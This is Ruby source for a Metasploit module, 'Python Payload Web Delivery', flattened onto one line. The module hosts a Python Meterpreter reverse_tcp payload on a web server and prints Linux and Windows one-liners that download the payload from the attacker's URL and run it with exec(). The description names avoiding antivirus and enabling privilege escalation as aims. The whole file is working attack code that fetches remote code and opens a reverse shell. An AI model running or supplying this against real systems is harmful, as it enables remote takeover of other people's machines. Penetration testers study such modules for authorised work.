## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super(update_info(info, 'Name' => 'Python Payload Web Delivery', 'Description' => %q{ This module quickly fires up a web server that serves a Python payload. The provided command will start Python and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. }, 'License' => MSF_LICENSE, 'Author' => [ 'Andrew Smith "jakx_" ', 'Ben Campbell ' #Idea for module structure ], 'DefaultOptions' => { 'Payload' => 'python/meterpreter/reverse_tcp' }, 'References' => [ [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'] [ 'URL', 'http://docs.python.org/2/library/urllib2.html'] ], 'Platform' => 'py', 'Targets' => [ ['Automatic Targeting', { 'auto' => true }] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'N/A')) end def on_request_uri(cli, request) print_status("Delivering Payload") data = %Q|#{payload.encoded} | send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) end def primer url = get_uri() print_status("Run the following command on the target machine:") print_line("For Linux: python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") print_line("For Windows: python.exe -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") end end